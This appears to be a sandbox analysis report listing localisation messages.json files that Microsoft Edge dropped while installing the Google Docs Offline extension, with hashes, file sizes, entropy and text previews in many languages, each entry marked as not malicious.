                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):939
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
